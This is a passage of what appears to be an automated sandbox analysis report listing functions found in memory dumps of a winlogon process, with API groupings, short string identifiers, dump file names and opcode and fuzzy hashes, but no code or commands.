                                                          • Instruction Fuzzy Hash: 12F08C60304BD092EF108BA7BD88219A260BB8CFC0F888172EE5E07B79CF2CC9458710
                                                          Function 000002D0165EC0C8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: 98eb24e4d57f1585c54f2d3d16aa4b08ded3b1fa128793edf9192e1fe004f7b7
                                                          • Instruction ID: 1bbfd0d0181f79ce92fa85e2204fa79ab9098d121dfd698e154c4333107ee7c2
                                                          • Opcode Fuzzy Hash: 98eb24e4d57f1585c54f2d3d16aa4b08ded3b1fa128793edf9192e1fe004f7b7
                                                          • Instruction Fuzzy Hash: F2F09065311A8181EF188BE4ECCC3296360FB887A5FD4125BDA6E462F4CF2DC948C310
                                                          Function 000002D0165E5B40 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: 3d2bacb6cfedfda86da8aef618d55a465eaed815584c29066aa84670fc6d8ab3
                                                          • Instruction ID: 60600bb0f7767c314363c39a07b9ff83c9262393bfb243a1703b11c97863d28b
                                                          • Opcode Fuzzy Hash: 3d2bacb6cfedfda86da8aef618d55a465eaed815584c29066aa84670fc6d8ab3
                                                          • Instruction Fuzzy Hash: 84619136619B84C7EB60CB95E99831AB7A4F384754F901116FA8E47BB4DB7ECA44CF00
                                                          Function 000002D016593934 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000003.2231390678.000002D016580000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_3_2d016580000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: _set_statfp
                                                          • String ID:
                                                          • API String ID: 1156100317-0
                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction ID: 3fd1773397185434a97919cd340e0ae31bd0b89bcc84e2b89b2f3325c9289b53
                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction Fuzzy Hash: 1911C632A15AC0C5FB541EE8ECDE36914546B643BCFC52637AA7E0A2FBCF28CC448100
                                                          Function 000002D0165F4534 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: _set_statfp
                                                          • String ID:
                                                          • API String ID: 1156100317-0
                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction ID: 54a786291861fe94d045adb98334aad2a449724ce9aef7fbf1e65a188d02e38a
                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction Fuzzy Hash: 4011CC32A16AD101FB5832E4ECDD3691D816B59378FC446B7AA7E067F7CB24CC494200
                                                          Function 000002D0165EAE4C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CallEncodePointerTranslator
                                                          • String ID: MOC$RCC
                                                          • API String ID: 3544855599-2084237596
                                                          • Opcode ID: 05fb19cb5d958d360e5f46d501e280b4416caeae58329d8bd7a5de4c8cbcf2a2
                                                          • Instruction ID: e34cecc76fbc14008044abe63a4b6d95f846595ab788ded8b10d6db0ff7985c2
                                                          • Opcode Fuzzy Hash: 05fb19cb5d958d360e5f46d501e280b4416caeae58329d8bd7a5de4c8cbcf2a2
                                                          • Instruction Fuzzy Hash: 1A617D77A00B848AEB20DFA5D88439DB7A0F744B88F444216EF5D17BA9DB39DA95C700
                                                          Function 000002D01658A5A8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000003.2231390678.000002D016580000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_3_2d016580000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          • API String ID: 3896166516-3733052814
                                                          • Opcode ID: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                          • Instruction ID: 7282ddc68bfdaa4e78263fba1861d806cdaf687bbc007268760927ceaafd848d
                                                          • Opcode Fuzzy Hash: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                          • Instruction Fuzzy Hash: D6516D326007C086EB648FA7998835877A8F354B94F945117DE9D87FEADB38D861DB00
                                                          Function 000002D0165EB1A8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          • API String ID: 3896166516-3733052814
                                                          • Opcode ID: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                          • Instruction ID: 224713e3047f848022d7ff7e0bc2caf07f455a724ffe94c4f97ae2bcea0e1f0e
                                                          • Opcode Fuzzy Hash: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                          • Instruction Fuzzy Hash: 62517B325003C086EF648FA1AEC935CB6A1E759B86F945217DA8D87BE5CB3ACE508710
                                                          Function 000002D0165E3554 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                          • String ID: pid_
                                                          • API String ID: 517849248-4147670505
                                                          • Opcode ID: 003ff62f248625063318c3f9e3d6e241277a7bda76ff5f02da447dbddd7f43fe
                                                          • Instruction ID: 9c27c4b32806b3b1d71bd2bce81768bde19e2a22b031ad4b71d42f21e49c3578
                                                          • Opcode Fuzzy Hash: 003ff62f248625063318c3f9e3d6e241277a7bda76ff5f02da447dbddd7f43fe
                                                          • Instruction Fuzzy Hash: 8E1172213147D191EF609BB5EC89399A2A4FB44780FD541639E4CC37A6EF2ACE04CB40
                                                          Function 000002D0165F2488 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                          • String ID:
                                                          • API String ID: 2718003287-0
                                                          • Opcode ID: 795992a6124246315900671f12580f797be80ebc569419187a9af15682e1d93c
                                                          • Instruction ID: 25e7d65e2427a61e100b32ad16220a2455b58a3823e48bab8ac3b682fdcbe701
                                                          • Opcode Fuzzy Hash: 795992a6124246315900671f12580f797be80ebc569419187a9af15682e1d93c
                                                          • Instruction Fuzzy Hash: 63D1DE72B04B8089EB11CFE9D88839C77B1F354BD8F848256DE5D97BA9DA38C946C740
                                                          Function 000002D0165E14A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Free
                                                          • String ID:
                                                          • API String ID: 3168794593-0
                                                          • Opcode ID: f2d6af867017c8fdca06cc75cff9703ddcaaa443aeb9202065457787ca9ddd0f
                                                          • Instruction ID: be78f24107b1671ef84e7d40fa4da5dde535f615ce35d926ab804172758d56a0
                                                          • Opcode Fuzzy Hash: f2d6af867017c8fdca06cc75cff9703ddcaaa443aeb9202065457787ca9ddd0f
                                                          • Instruction Fuzzy Hash: 8F015A32600AE0C6E754DFA6EC8868AB7A0F788F81F444426EA8E43729DF38C851C750
                                                          Function 000002D0165F2DB0 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000002D0165F2D9B), ref: 000002D0165F2ECC
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000002D0165F2D9B), ref: 000002D0165F2F57
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ConsoleErrorLastMode
                                                          • String ID:
                                                          • API String ID: 953036326-0
                                                          • Opcode ID: ed4da88c6f9953f7d7ff9071fd661f4bfe943a7a16315c9e976136c82c347ad5
                                                          • Instruction ID: 550462a37ef2485ebe7c3d17cb0b580bb918d88b25f7e98020fc8259c8a8c218
                                                          • Opcode Fuzzy Hash: ed4da88c6f9953f7d7ff9071fd661f4bfe943a7a16315c9e976136c82c347ad5
                                                          • Instruction Fuzzy Hash: EF9190B261069085F7609FF59CC83AD2BA4F744BC8F94819BDE0E57AA5DB74CC86C740
                                                          Function 000002D0165E7D90 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                          • String ID:
                                                          • API String ID: 2933794660-0
                                                          • Opcode ID: 489f61d66183c236694581db33bccd4d3439c18b3469579d7712a38510163ede
                                                          • Instruction ID: d941e2ee91bad08c37433e505f6b50f08559376d36f66cf014fbf396711dcdc5
                                                          • Opcode Fuzzy Hash: 489f61d66183c236694581db33bccd4d3439c18b3469579d7712a38510163ede
                                                          • Instruction Fuzzy Hash: 00113322714F5089EF00CFB0EC983A833A4F719758F441E26EA6D47764DF78C5948380
                                                          Function 000002D0165E2604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3081899298-91387939
                                                          • Opcode ID: 33e1af66e0871330679004fe562d697de0fc8c89851f4c88526204be402beab6
                                                          • Instruction ID: 62e8b36a1bb9a464023b3d4363badca2feeff15eb65837821e5b6c73b3e83663
                                                          • Opcode Fuzzy Hash: 33e1af66e0871330679004fe562d697de0fc8c89851f4c88526204be402beab6
                                                          • Instruction Fuzzy Hash: 4271A0226047C14AEF659EA69C983AAB7A4F789BC4F944017DD0D43BA9DE36CF04C740
                                                          Function 000002D01658A24C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000003.2231390678.000002D016580000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_3_2d016580000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CallTranslator
                                                          • String ID: MOC$RCC
                                                          • API String ID: 3163161869-2084237596
                                                          • Opcode ID: 30a9d0c0d3f57c599bda06983a5ca6919b98e12de895e70124a407b05a736fc2
                                                          • Instruction ID: 3e58a82ac438e65841448e661121e414277e338513a823496b8bfd3f8d02a616
                                                          • Opcode Fuzzy Hash: 30a9d0c0d3f57c599bda06983a5ca6919b98e12de895e70124a407b05a736fc2
                                                          • Instruction Fuzzy Hash: 89618A33604B84CAEB20DFAAD88439D77A4F348B88F444216EF4D17BA9DB78D895C700
                                                          Function 000002D0165E23F8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3081899298-91387939
                                                          • Opcode ID: d24fa520fd7dbb7ec2b76f1d32a897148e6d9871f9771e10c0de33aaa48a33cd
                                                          • Instruction ID: 16c06fefd71004c443562dd9b8eb039bd8a313772ba79083b5d51de1618eab5a
                                                          • Opcode Fuzzy Hash: d24fa520fd7dbb7ec2b76f1d32a897148e6d9871f9771e10c0de33aaa48a33cd
                                                          • Instruction Fuzzy Hash: 7351A1222047C145EB249A65ADE83AAB761B3857C0FD48017DE5D47BADDA3ACE44CB40
                                                          Function 000002D016592DDB Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000003.2231390678.000002D016580000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_3_2d016580000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: _log10_special
                                                          • String ID: dll
                                                          • API String ID: 3812965864-1037284150
                                                          • Opcode ID: f5c871aa60dc0e0ec45b8b1933c36a9d422e8a67736998cb73b4f17a378e9579
                                                          • Instruction ID: 22a895a7c19ecf55829837ab18d511ccb615642d92a1f727a12385b2ee07f9e3
                                                          • Opcode Fuzzy Hash: f5c871aa60dc0e0ec45b8b1933c36a9d422e8a67736998cb73b4f17a378e9579
                                                          • Instruction Fuzzy Hash: D2614F21925FC8C9E7639BB99C993266718BF627CCFC1D307E84E71A71EB19D8139200
                                                          Function 000002D0165F2B20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastWrite
                                                          • String ID: U
                                                          • API String ID: 442123175-4171548499
                                                          • Opcode ID: 08a3ddd2b86f7b8515106781585b8c8a1d40bea7a265024b77d0f248b7dc9f58
                                                          • Instruction ID: 190324b4559fddd95f0b569ea860501a90d2ba02e42452dfbb69c1103015e417
                                                          • Opcode Fuzzy Hash: 08a3ddd2b86f7b8515106781585b8c8a1d40bea7a265024b77d0f248b7dc9f58
                                                          • Instruction Fuzzy Hash: E641D772314A8092DB20DFA5F8883AA77A1F7987D4F908026EE4D877A4DF7CC945C740
                                                          Function 000002D0165E98D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFileHeaderRaise
                                                          • String ID: csm
                                                          • API String ID: 2573137834-1018135373
                                                          • Opcode ID: d6e187f7c3a97b3215a18421b3b0fdb8c27e8d274db127c5d8f8eb200af9c340
                                                          • Instruction ID: fb88d103afe6bf17a54f131a258ada04db8f3780c49a163a9c4a64debe83788e
                                                          • Opcode Fuzzy Hash: d6e187f7c3a97b3215a18421b3b0fdb8c27e8d274db127c5d8f8eb200af9c340
                                                          • Instruction Fuzzy Hash: 9D113D32214B8482EB218F25F884359B7E5F788B94F984225EECC47768DF3DC951CB00
                                                          Function 000002D016587786 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000003.2231390678.000002D016580000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_3_2d016580000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: __std_exception_copy
                                                          • String ID: `vector constructor iterator'$ctor closure'
                                                          • API String ID: 592178966-3792692944
                                                          • Opcode ID: 3d94f62f39723b7dc1272b79e31019e2f4db169682176d2f048e7421b3153389
                                                          • Instruction ID: 7b80f8931247e2175565a61b1f7b82bad4e3170703212fd302aeb39c11bf220f
                                                          • Opcode Fuzzy Hash: 3d94f62f39723b7dc1272b79e31019e2f4db169682176d2f048e7421b3153389
                                                          • Instruction Fuzzy Hash: 9DE086A1641B84D0EF018F62E8C439833A4DB58B5CF8891239A5C07325FA38D5F9C300
                                                          Function 000002D0165877E4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000003.2231390678.000002D016580000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_3_2d016580000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: __std_exception_copy
                                                          • String ID: ctor closure'$destructor iterator'
                                                          • API String ID: 592178966-595914035
                                                          • Opcode ID: 178c451bf754e9b3f91433b5168c8e4fc02ede9add1333831d18f9cb102bf374
                                                          • Instruction ID: 89822915fa747b39e330aa74c4db848010c387d1732ab2bf10a0a0dbfed0f49e
                                                          • Opcode Fuzzy Hash: 178c451bf754e9b3f91433b5168c8e4fc02ede9add1333831d18f9cb102bf374
                                                          • Instruction Fuzzy Hash: C9E086A1601B84C0EF018F62E8D02983364E758B5CFC891238A5C07325EA38D5E5C300
                                                          Function 000002D0165878EC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000003.2231390678.000002D016580000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_3_2d016580000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: std::bad_alloc::bad_alloc
                                                          • String ID: `scalar deleting destructor'$rFeaturePresent
                                                          • API String ID: 1875163511-1689945142
